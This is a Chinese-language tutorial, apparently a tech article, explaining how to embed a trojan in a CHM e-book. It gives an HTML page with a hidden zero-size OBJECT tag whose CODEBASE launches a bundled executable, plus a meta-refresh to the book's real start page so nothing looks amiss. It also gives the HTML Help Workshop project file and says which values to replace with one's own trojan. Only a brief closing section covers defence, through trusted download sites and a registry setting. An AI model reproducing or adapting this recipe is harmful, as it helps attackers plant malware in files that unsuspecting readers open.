說起CHM格式的電子書，可能無人不曉。有很大一部分電子圖書都是使用CHM格式編譯的。由于木馬程序嵌入了電子書中，殺毒軟件無法對其中存在的病毒等破壞性程序進行檢查和清除。想知道這類電子書的制作方法嗎？今天筆者就以實例形式和大家一道分析一下。 
　　Step1:要想制作一個完美的CHM木馬，當然少不了電子書的制作工具。在這里我們選擇微軟自家的Microsoft HTML Help Workshop。
　　當然了，作為木馬程序的載體，一本CHM電子書是少不了的。本文演示所采用的是系統(tǒng)幫助文件中現(xiàn)成的windows.chm。

　　Step2:首先運行windows.chm，在右側(cè)的空白處點擊右鍵菜單，進入"屬性"頁。記錄下該電子文檔的默認主頁default.htm和標題欄文字Windows 2000兩項信息。

　　Step3:接下來需要制作一個可以讓木馬運行并且同時可以自動跳轉(zhuǎn)到windows.chm默認主頁的網(wǎng)頁，例如cytkk.htm，源代碼如下：

<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='default.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobje
ct" CODEBASE="灰色按鈕克星.exe">
</OBJECT>
</BODY>
</HTML>

　　代碼注釋：

　　content="3是轉(zhuǎn)向時間（單位為秒），可以根據(jù)木馬程序的運行時間自行修改，建議不要超過5秒。其中的default.htm可以改為你用的電子書的默認主頁名，灰色按鈕克星.exe為木馬程序名，你可以根據(jù)情況更改。

　　Step4:運行HTML Help Workshop，選擇文件菜單下的反編譯項。接下來在反編譯后的目錄中可以看到windows.hhc（對應(yīng)幫助文檔左側(cè)的"目錄"項）和windows.hhk（對應(yīng)幫助文檔左側(cè)的"索引"項）。

　　Step5:現(xiàn)在要做的就是把木馬程序復制到反編譯后的目錄中（本文中以插入灰色按鈕克星.exe這款小軟件為例），并在此目錄下建立一個例如文件名為cytkk.hhp的文件（用記事本即可），代碼如下：

[OPTIONS]
Compatibility=1.1 or later
Compiled file=windows.chm
Default Window=Main
Language=0x804 中文(中國)
[WINDOWS]
Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
[FILES]
cytkk.htm

　　灰色按鈕克星.exe

　　代碼注釋：

　　windows.chm可以改為你要生成的電子書名，而灰色按鈕克星.exe則把它改為要嵌入的木馬程序名，Main=后面改為在第一步時你得到的標題欄文字，windows.hhc及windows.hhk分別改為第三步得到的文件名。

　　最后用HTML Help Workshop打開cytkk.hhp，點擊"文件"→"編譯"，待提示完成后，就可以在目標目錄中發(fā)現(xiàn)已經(jīng)編譯好的帶有木馬的電子書windows.chm了。

　　高手傳經(jīng)：防之有道

　　我們不可能對下載的每本書都進行反編譯工作來加以檢查，那是會累死人的。筆者建議大家在下載電子書籍時，盡量去知名網(wǎng)站下載。
另外讀者朋友們也可以修改本地安全屬性，使CHM木馬無法在本地運行木馬程序，將注冊表"HKEY_CURRENT_U
SER\Software\Microsoft\Windows\Current
Version\Internet Settings\Zones\0"下的1004項的值由原來十進制的0改為十六進制的3。

最新評論